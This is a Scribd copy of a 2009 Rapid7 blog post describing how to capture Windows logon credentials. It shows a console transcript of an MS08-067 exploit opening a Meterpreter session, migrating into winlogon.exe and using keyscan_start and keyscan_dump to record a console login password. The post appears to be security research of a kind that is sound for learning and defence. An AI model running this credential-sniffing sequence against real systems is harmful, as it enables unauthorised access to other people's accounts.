Scribd Logo
Upload

Welcome to Scribd!

  • Capturing Logon Credentials With Meterpreter

    Uploaded by

    mindhackers161
    3 views3 pages
    The document discusses using Meterpreter to capture login credentials by migrating into the Winlogon.exe process. While keystroke sniffing is not possible from Winlogon, it can access the username and password of anyone logging into the target's console. The example provided demonstrates migrating to Winlogon, starting the keyscan to monitor for logins, and dumping the captured credentials after a user logs in.

    Original Description:

    Original Title

    Capturing Logon Credentials with Meterpreter

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document discusses using Meterpreter to capture login credentials by migrating into the Winlogon.exe process. While keystroke sniffing is not possible from Winlogon, it can access the username and password of anyone logging into the target's console. The example provided demonstrates migrating to Winlogon, starting the keyscan to monitor for logins, and dumping the captured credentials after a user logs in.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    3 views3 pages

    Capturing Logon Credentials With Meterpreter

    Uploaded by

    mindhackers161
    The document discusses using Meterpreter to capture login credentials by migrating into the Winlogon.exe process. While keystroke sniffing is not possible from Winlogon, it can access the username and password of anyone logging into the target's console. The example provided demonstrates migrating to Winlogon, starting the keyscan to monitor for logins, and dumping the captured credentials after a user logs in.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 3

    Capturing Logon Credentials with

    Meterpreter
     Mar 22, 2009

     1 min read

     Rapid7

    Last updated at Wed, 27 Sep 2017 15:27:00 GMT

    In my previous post, I described the keystroke sniffing capabilities of the Meterpreter

    payload. One of the key restrictions of this feature is that it can only sniff while running

    inside of a process with interactive access to the desktop. In the case of the MS08-067

    exploit, we had to migrate into Explorer.exe in order to capture the logged-on user's

    keystrokes.

    While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe

    process instead. This process should have interactive access to the desktop, however

    when I tried to sniff the active user's keystrokes this way, it was not successful. Although

    Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can

    capture the username and password of anyone logging into the target's console. The

    example below demonstrates this process:

    msf exploit(ms08_067_netapi) > exploit

    [*] Triggering the vulnerability...

    [*] Sending stage (2650 bytes)


    [*] Uploading DLL (75787 bytes)...

    [*] Upload completed.

    [*] Meterpreter session 1 opened

    meterpreter > ps

    Process list

    ============

    PID Name Path

    --- ---- ----

    292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe

    316 Explorer.EXE C:\WINDOWS\Explorer.EXE

    356 smss.exe \SystemRoot\System32\smss.exe

    416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe

    440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe

    [ snip ]

    meterpreter > migrate 440

    [*] Migrating to 440...


    [*] Migration completed successfully.

    meterpreter > keyscan_start

    Starting the keystroke sniffer...

    [ wait for user login ]

    meterpreter > keyscan_dump

    Dumping captured keystrokes...

    Administrator <Tab> s3cretp4ss <Return>

    You might also like